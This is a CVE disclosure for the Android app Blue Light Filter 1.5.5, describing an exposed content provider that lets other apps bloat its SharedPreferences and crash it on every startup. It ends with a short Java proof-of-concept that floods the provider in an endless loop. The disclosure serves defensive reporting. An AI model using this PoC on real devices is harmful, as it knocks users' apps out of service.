Headline
CVE-2023-29758: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs
An issue found in Blue Light Filter v.1.5.5 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.
Denial of Service exists in Blue Light Filter(CVE-2023-29758)
Vendor: Leap Fitness Group(https://leap.app/)
Affected product: Blue Light Filter(com.eyefilter.nightmode.bluelightfilter)
Version: 1.5.5
Download link: https://play.google.com/store/apps/details?id=com.eyefilter.nightmode.bluelightfilter
Description of the vulnerability for use in the CVE:An issue found in Blue Light Filter v.1.5.5 allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.
Additional information: The Blue Light Filter application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.
poc:
public void attack_eye() { while(true) { ContentResolver contentResolver = getContentResolver(); ContentValues contentValues = new ContentValues(); Uri uri = Uri.parse(“content://com.eyefilter.nightmode.bluelightfilter.PREFFERENCE_AUTHORITY/a/a”); String randomString = getRandomString(1000); contentValues.put(randomString,randomString); contentResolver.insert(uri, contentValues); } }